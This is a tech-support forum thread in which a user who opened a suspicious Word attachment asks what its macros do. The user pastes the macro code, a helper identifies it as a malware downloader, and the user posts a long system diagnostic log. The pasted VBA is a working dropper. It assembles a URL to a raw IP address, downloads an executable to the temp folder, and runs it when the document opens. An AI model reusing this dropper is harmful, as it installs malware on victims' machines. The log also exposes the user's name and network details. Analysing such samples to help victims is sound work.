Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Virus? What does this code do?


  • Please log in to reply
16 replies to this topic

#1 broncosrul

broncosrul

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 11 May 2015 - 08:45 PM

I received a file from a coworker who had it sent from someone they didn't know.  Without paying attention, I opened it.  It appeared to be a Word Document.  It had this written in the Word document when I tried to open it.

 

 

PROTECTED DOCUMENT

This file is protected by Microsoft Office.

Please enable Editing and Content to see this document.

 

CAN’T VIEW THE DOCUMENT? FOLLOW THE STEPS BELOW.

1.            Open the document in Microsoft Office. Previewing online does not work for protected documents.

2.            If you downloaded this document from your email, please click “Enable Editing” from the yellow bar above.

3.            Once you have enabled editing, please click “Enable Content” on the yellow bar above.

 

 

Since it came from my friend, I assumed they had already opened it.  However, when I enabled the content, nothing happened and it made me start to think it was a Trojan of some sort.  I looked in the VB and found these 3 macros, which don't look good to me.

#If Win64 Then
Private Declare PtrSafe Function XSS Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hWnd As Long, ByVal lpOperation As String, _
ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
#Else
Private Declare Function XSS Lib "shell32.dll" Alias "ShellExecuteA" _
(ByVal hWnd As Long, ByVal lpOperation As String, _
ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, _
ByVal nShowCmd As Long) As Long
#End If


Sub Document_Open()
Dim a As String
Dim b As String
Dim c As Long
Dim d As Long
d = 0
a = Environ("tmp")
b = "xe"
a = a & "\lf.e" & b
b = "http" & "://148" & ".251.248" & ".4/images/si" & "gchk.e" & "xe"
Dim oXMLHTTP As MSXML2.XMLHTTP30, vFF As Long, oResp() As Byte
Set oXMLHTTP = New MSXML2.XMLHTTP30
oXMLHTTP.Open "GET", b, False
oXMLHTTP.send
If oXMLHTTP.Status = 200 Then
    vFF = FreeFile
    oResp = xss2(oXMLHTTP)
    Open a For Binary As #vFF
    Put #vFF, , oResp
    Close #vFF
End If
XSS 0, "o" & "pen", a, "", vbNullString, vbNormalFocus
End Sub

Function xss2(ByRef a As MSXML2.XMLHTTP30) As Byte()
Dim oResp() As Byte
oResp = a.responseBody
xss2 = oResp
End Function

Please let me know if I should be concerned.  What does the code do?  Do I need to do something to correct it now?

 

Thanks in advance.

 

Travis

 

 



BC AdBot (Login to Remove)

 


#2 Sintharius

Sintharius

    Bleepin' Sniper


  • Members
  • 5,639 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Netherlands
  • Local time:08:32 PM

Posted 11 May 2015 - 11:40 PM

Hi there,

It appears that you have opened a Word document containing a macro designed for downloading malware to your machine. They are most commonly seen as a vector for some banking trojans like Dridex.

Let's get a checkup since your machine is likely to be infected at this point.

MiniToolbox by Farbar

Please download MiniToolBox, save it to your desktop and run it.
Checkmark the following checkboxes:
  • Flush DNS
  • Report IE Proxy Settings
  • Reset IE Proxy Settings
  • Report FF Proxy Settings
  • Reset FF Proxy Settings
  • List content of Hosts
  • List IP configuration
  • List Winsock Entries
  • List last 10 Event Viewer log
  • List Installed Programs
  • List Devices
  • List Users, Partitions and Memory size.
  • List Minidump Files
  • List Restore Points
Click Go and post the result (Result.txt). A copy of Result.txt will be saved in the same directory the tool is run.

===

Security Check by screen317
  • Download Security Check by screen317 from here or here.
  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
A Notepad document should open automatically called checkup.txt. Please copy and paste the contents of the log in your next reply.

Regards,
Alex

#3 broncosrul

broncosrul
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:12:32 PM

Posted 12 May 2015 - 11:17 AM

For the checkbox that says "list devices" it has a radio button that is defaulted to "only problems".  I left it there.  Let me know if I should have switched it to "all"

 

By the way, this is a work computer that has been used by Tiffany and Dido and the profiles are not properly cleaned up.  That is why you may see references to those names.

 

 

MiniToolBox by Farbar  Version: 11-05-2015 01
Ran by Dido (administrator) on 12-05-2015 at 08:58:19
Running from "C:\Users\Dido\Desktop"
Microsoft Windows 8.1  (X64)
Model: 20255 Manufacturer: LENOVO
Boot Mode: Normal
***************************************************************************

========================= Flush DNS: ===================================

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========================= IE Proxy Settings: ==============================

Proxy is not enabled.
No Proxy Server is set.

"Reset IE Proxy Settings": IE Proxy Settings were reset.

========================= FF Proxy Settings: ==============================

"Reset FF Proxy Settings": Firefox Proxy settings were reset.

========================= Hosts content: =================================

 

========================= IP Configuration: ================================

Qualcomm Atheros AR9485WB-EG Wireless Network Adapter = Wi-Fi (Connected)
Qualcomm Atheros AR8172/8176/8178 PCI-E Fast Ethernet Controller (NDIS 6.30) = Ethernet (Media disconnected)
Bluetooth Device (Personal Area Network) = Bluetooth Network Connection (Media disconnected)

# ----------------------------------
# IPv4 Configuration
# ----------------------------------
pushd interface ipv4

reset
set global icmpredirects=enabled
set interface interface="Local Area Connection* 1" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Wi-Fi" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Ethernet" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Bluetooth Network Connection" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="Local Area Connection* 12" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled
set interface interface="ethernet_3" forwarding=enabled advertise=enabled nud=enabled ignoredefaultroutes=disabled

popd
# End of IPv4 configuration

 

Windows IP Configuration

   Host Name . . . . . . . . . . . . : Travis
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : hsd1.ca.comcast.net

Wireless LAN adapter Local Area Connection* 12:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft Wi-Fi Direct Virtual Adapter
   Physical Address. . . . . . . . . : 1A-D2-24-62-F5-F9
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)
   Physical Address. . . . . . . . . : 48-D2-24-63-63-59
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Ethernet:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : hsd1.ca.comcast.net
   Description . . . . . . . . . . . : Qualcomm Atheros AR8172/8176/8178 PCI-E Fast Ethernet Controller (NDIS 6.30)
   Physical Address. . . . . . . . . : 20-89-84-EB-BB-36
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Wireless LAN adapter Wi-Fi:

   Connection-specific DNS Suffix  . : hsd1.ca.comcast.net
   Description . . . . . . . . . . . : Qualcomm Atheros AR9485WB-EG Wireless Network Adapter
   Physical Address. . . . . . . . . : 48-D2-24-62-F5-F9
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2601:9:5d81:f200::5c6d(Preferred)
   Lease Obtained. . . . . . . . . . : Tuesday, May 12, 2015 8:38:58 AM
   Lease Expires . . . . . . . . . . : Tuesday, May 19, 2015 8:38:58 AM
   IPv6 Address. . . . . . . . . . . : 2601:9:5d81:f200:d85:da41:a0f6:96ec(Preferred)
   Temporary IPv6 Address. . . . . . : 2601:9:5d81:f200:17b:c0d6:e243:14b5(Preferred)
   Link-local IPv6 Address . . . . . : fe80::d85:da41:a0f6:96ec%3(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.1.10.74(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Monday, May 11, 2015 11:59:20 AM
   Lease Expires . . . . . . . . . . : Tuesday, May 19, 2015 8:49:36 AM
   Default Gateway . . . . . . . . . : fe80::250:f1ff:fe80:0%3
                                       10.1.10.1
   DHCP Server . . . . . . . . . . . : 10.1.10.1
   DHCPv6 IAID . . . . . . . . . . . : 323539492
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-19-81-1A-7D-20-89-84-EB-BB-36
   DNS Servers . . . . . . . . . . . : 2001:558:feed::1
                                       2001:558:feed::2
                                       75.75.75.75
                                       75.75.76.76
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.hsd1.ca.comcast.net:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : hsd1.ca.comcast.net
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter Local Area Connection* 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:0:9d38:6ab8:3cdd:14c7:cd46:2622(Preferred)
   Link-local IPv6 Address . . . . . : fe80::3cdd:14c7:cd46:2622%8(Preferred)
   Default Gateway . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 201326592
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-19-81-1A-7D-20-89-84-EB-BB-36
   NetBIOS over Tcpip. . . . . . . . : Disabled
DNS request timed out.
    timeout was 2 seconds.
Server:  UnKnown
Address:  2001:558:feed::1

Name:    google.com
Addresses:  2607:f8b0:4005:801::200e
   216.58.192.14

Pinging google.com [2607:f8b0:4005:803::200e] with 32 bytes of data:
Reply from 2607:f8b0:4005:803::200e: time=30ms
Reply from 2607:f8b0:4005:803::200e: time=42ms

Ping statistics for 2607:f8b0:4005:803::200e:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 30ms, Maximum = 42ms, Average = 36ms
Server:  cdns01.comcast.net
Address:  2001:558:feed::1

Name:    yahoo.com
Addresses:  98.138.253.109
   98.139.183.24
   206.190.36.45

Pinging yahoo.com [98.139.183.24] with 32 bytes of data:
Reply from 98.139.183.24: bytes=32 time=112ms TTL=45
Reply from 98.139.183.24: bytes=32 time=122ms TTL=45

Ping statistics for 98.139.183.24:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 112ms, Maximum = 122ms, Average = 117ms

Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.0.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
===========================================================================
Interface List
  9...1a d2 24 62 f5 f9 ......Microsoft Wi-Fi Direct Virtual Adapter
  6...48 d2 24 63 63 59 ......Bluetooth Device (Personal Area Network)
  4...20 89 84 eb bb 36 ......Qualcomm Atheros AR8172/8176/8178 PCI-E Fast Ethernet Controller (NDIS 6.30)
  3...48 d2 24 62 f5 f9 ......Qualcomm Atheros AR9485WB-EG Wireless Network Adapter
  1...........................Software Loopback Interface 1
 11...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3
  8...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================

IPv4 Route Table
===========================================================================
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0        10.1.10.1       10.1.10.74     25
        10.1.10.0    255.255.255.0         On-link        10.1.10.74    281
       10.1.10.74  255.255.255.255         On-link        10.1.10.74    281
      10.1.10.255  255.255.255.255         On-link        10.1.10.74    281
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    306
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    306
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    306
        224.0.0.0        240.0.0.0         On-link        10.1.10.74    281
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    306
  255.255.255.255  255.255.255.255         On-link        10.1.10.74    281
===========================================================================
Persistent Routes:
  None

IPv6 Route Table
===========================================================================
Active Routes:
 If Metric Network Destination      Gateway
  3    281 ::/0                     fe80::250:f1ff:fe80:0
  1    306 ::1/128                  On-link
  8    306 2001::/32                On-link
  8    306 2001:0:9d38:6ab8:3cdd:14c7:cd46:2622/128
                                    On-link
  3    281 2601:9:5d81:f200::/64    On-link
  3    281 2601:9:5d81:f200::5c6d/128
                                    On-link
  3    281 2601:9:5d81:f200:17b:c0d6:e243:14b5/128
                                    On-link
  3    281 2601:9:5d81:f200:d85:da41:a0f6:96ec/128
                                    On-link
  3    281 fe80::/64                On-link
  8    306 fe80::/64                On-link
  3    281 fe80::d85:da41:a0f6:96ec/128
                                    On-link
  8    306 fe80::3cdd:14c7:cd46:2622/128
                                    On-link
  1    306 ff00::/8                 On-link
  8    306 ff00::/8                 On-link
  3    281 ff00::/8                 On-link
===========================================================================
Persistent Routes:
  None
========================= Winsock entries =====================================

Catalog5 01 C:\WINDOWS\SysWOW64\napinsp.dll [55296] (Microsoft Corporation)
Catalog5 02 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70144] (Microsoft Corporation)
Catalog5 03 C:\WINDOWS\SysWOW64\pnrpnsp.dll [70144] (Microsoft Corporation)
Catalog5 04 C:\WINDOWS\SysWOW64\NLAapi.dll [65536] (Microsoft Corporation)
Catalog5 05 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog5 06 C:\WINDOWS\SysWOW64\winrnr.dll [23040] (Microsoft Corporation)
Catalog5 07 C:\WINDOWS\SysWOW64\wshbth.dll [50688] (Microsoft Corporation)
Catalog9 01 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 02 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 03 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 04 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 05 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 06 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 07 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 08 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 09 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 10 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
Catalog9 11 C:\WINDOWS\SysWOW64\mswsock.dll [286208] (Microsoft Corporation)
x64-Catalog5 01 C:\Windows\System32\napinsp.dll [69120] (Microsoft Corporation)
x64-Catalog5 02 C:\Windows\System32\pnrpnsp.dll [88576] (Microsoft Corporation)
x64-Catalog5 03 C:\Windows\System32\pnrpnsp.dll [88576] (Microsoft Corporation)
x64-Catalog5 04 C:\Windows\System32\NLAapi.dll [86016] (Microsoft Corporation)
x64-Catalog5 05 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog5 06 C:\Windows\System32\winrnr.dll [30720] (Microsoft Corporation)
x64-Catalog5 07 C:\Windows\System32\wshbth.dll [63488] (Microsoft Corporation)
x64-Catalog9 01 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 02 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 03 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 04 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 05 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 06 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 07 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 08 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 09 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 10 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)
x64-Catalog9 11 C:\Windows\System32\mswsock.dll [339456] (Microsoft Corporation)

========================= Event log errors: ===============================

Application errors:
==================
Error: (05/11/2015 09:10:24 PM) (Source: Application Hang) (User: )
Description: The program LiveComm.exe version 17.5.9600.20856 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 13d8

Start Time: 01d08c68dabae1f3

Termination Time: 4294967295

Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20856_x64__8wekyb3d8bbwe\LiveComm.exe

Report Id: ceb1448b-f85c-11e4-beaf-48d224636359

Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20856_x64__8wekyb3d8bbwe

Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1

Error: (05/11/2015 07:42:40 PM) (Source: Application Error) (User: )
Description: Faulting application name: EXCEL.EXE, version: 15.0.4711.1000, time stamp: 0x550914e0
Faulting module name: EXCEL.EXE, version: 15.0.4711.1000, time stamp: 0x550914e0
Exception code: 0xc0000005
Fault offset: 0x0072042e
Faulting process id: 0xbfc
Faulting application start time: 0xEXCEL.EXE0
Faulting application path: EXCEL.EXE1
Faulting module path: EXCEL.EXE2
Report Id: EXCEL.EXE3
Faulting package full name: EXCEL.EXE4
Faulting package-relative application ID: EXCEL.EXE5

Error: (05/11/2015 10:44:53 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest2" on line C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_6240486fecbd8abb.manifest.

Error: (05/11/2015 10:44:08 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (05/11/2015 10:36:38 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest2" on line C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_6240486fecbd8abb.manifest.

Error: (05/11/2015 10:36:18 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (05/11/2015 10:31:51 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (05/11/2015 09:55:17 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest1".Error in manifest or policy file "C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest2" on line C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest3.
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifest.
Component 2: C:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_6240486fecbd8abb.manifest.

Error: (05/11/2015 09:54:52 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

Error: (05/11/2015 09:24:39 AM) (Source: SideBySide) (User: )
Description: Activation context generation failed for "1".Error in manifest or policy file "2" on line 3.
The manifest file root element must be assembly.

System errors:
=============
Error: (05/11/2015 11:37:15 AM) (Source: Schannel) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 106.

Error: (05/11/2015 11:36:01 AM) (Source: Schannel) (User: NT AUTHORITY)
Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 106.

Error: (05/09/2015 01:42:32 PM) (Source: bowser) (User: )
Description: The master browser has received a server announcement from the computer TRAVIS-HPLAPTOP
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{8303371F-0F2F-492F-8063-7BB76DFD469F}.
The master browser is stopping or an election is being forced.

Error: (05/09/2015 01:06:34 PM) (Source: bowser) (User: )
Description: The master browser has received a server announcement from the computer TRAVIS-HPLAPTOP
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{8303371F-0F2F-492F-8063-7BB76DFD469F}.
The master browser is stopping or an election is being forced.

Error: (05/09/2015 11:58:47 AM) (Source: NetBT) (User: )
Description: The name "WORKGROUP      :1d" could not be registered on the interface with IP address 10.0.0.3.
The computer with the IP address 10.0.0.5 did not allow the name to be claimed by
this computer.

Error: (05/09/2015 11:42:32 AM) (Source: bowser) (User: )
Description: The master browser has received a server announcement from the computer TRAVIS-HPLAPTOP
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{8303371F-0F2F-492F-8063-7BB76DFD469F}.
The master browser is stopping or an election is being forced.

Error: (05/09/2015 11:31:49 AM) (Source: NetBT) (User: )
Description: The name "WORKGROUP      :1d" could not be registered on the interface with IP address 10.0.0.3.
The computer with the IP address 10.0.0.5 did not allow the name to be claimed by
this computer.

Error: (05/09/2015 11:26:39 AM) (Source: NetBT) (User: )
Description: The name "WORKGROUP      :1d" could not be registered on the interface with IP address 10.0.0.3.
The computer with the IP address 10.0.0.5 did not allow the name to be claimed by
this computer.

Error: (05/09/2015 10:48:25 AM) (Source: Schannel) (User: NT AUTHORITY)
Description: A fatal alert was received from the remote endpoint. The TLS protocol defined fatal alert code is 20.

Error: (05/09/2015 10:30:35 AM) (Source: bowser) (User: )
Description: The master browser has received a server announcement from the computer TRAVIS-HPLAPTOP
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{8303371F-0F2F-492F-8063-7BB76DFD469F}.
The master browser is stopping or an election is being forced.

Microsoft Office Sessions:
=========================
Error: (05/11/2015 09:10:24 PM) (Source: Application Hang)(User: )
Description: LiveComm.exe17.5.9600.2085613d801d08c68dabae1f34294967295C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20856_x64__8wekyb3d8bbwe\LiveComm.execeb1448b-f85c-11e4-beaf-48d224636359microsoft.windowscommunicationsapps_17.5.9600.20856_x64__8wekyb3d8bbweppleae38af2e007f4358a809ac99a64a67c1

Error: (05/11/2015 07:42:40 PM) (Source: Application Error)(User: )
Description: EXCEL.EXE15.0.4711.1000550914e0EXCEL.EXE15.0.4711.1000550914e0c00000050072042ebfc01d08c5d4625fd1bC:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXEC:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE8e671997-f850-11e4-beaf-48d224636359

Error: (05/11/2015 10:44:53 AM) (Source: SideBySide)(User: )
Description: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifestC:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_6240486fecbd8abb.manifestc:\program files (x86)\Adobe\adobe creative cloud\Utils\Creative Cloud Uninstaller.exe

Error: (05/11/2015 10:44:08 AM) (Source: SideBySide)(User: )
Description: c:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exec:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exe2

Error: (05/11/2015 10:36:38 AM) (Source: SideBySide)(User: )
Description: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifestC:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_6240486fecbd8abb.manifestc:\program files (x86)\Adobe\adobe creative cloud\Utils\Creative Cloud Uninstaller.exe

Error: (05/11/2015 10:36:18 AM) (Source: SideBySide)(User: )
Description: c:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exec:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exe2

Error: (05/11/2015 10:31:51 AM) (Source: SideBySide)(User: )
Description: c:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exec:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exe2

Error: (05/11/2015 09:55:17 AM) (Source: SideBySide)(User: )
Description: C:\WINDOWS\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_a9ed7f470139b3c1.manifestC:\WINDOWS\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.17415_none_6240486fecbd8abb.manifestc:\program files (x86)\Adobe\adobe creative cloud\Utils\Creative Cloud Uninstaller.exe

Error: (05/11/2015 09:54:52 AM) (Source: SideBySide)(User: )
Description: c:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exec:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exe2

Error: (05/11/2015 09:24:39 AM) (Source: SideBySide)(User: )
Description: c:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exec:\program files\windowsapps\c59ad0af.lenovocloudstoragebysugarsync_1.3.0.889_neutral__m3tnjedffpfhj\SugarSyncWin8.exe2

=========================== Installed Programs ============================

ÃÀͼ¿´¿´ 2.2.7 (HKCU\...\ÃÀͼ¿´¿´) (Version: 2.2.7 - Meitu, Inc.)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 16.0.0.273 - Adobe Systems Incorporated)
Adobe Connect 9 Add-in (HKCU\...\Adobe Connect 9 Add-in) (Version: 11,9,970,233 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.1.418 - Adobe Systems Incorporated)
Adobe Illustrator CC 2014 (HKLM-x32\...\{2B4B4082-8043-4646-8334-B0A29E641211}) (Version: 18.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.10 - Adobe Systems Incorporated)
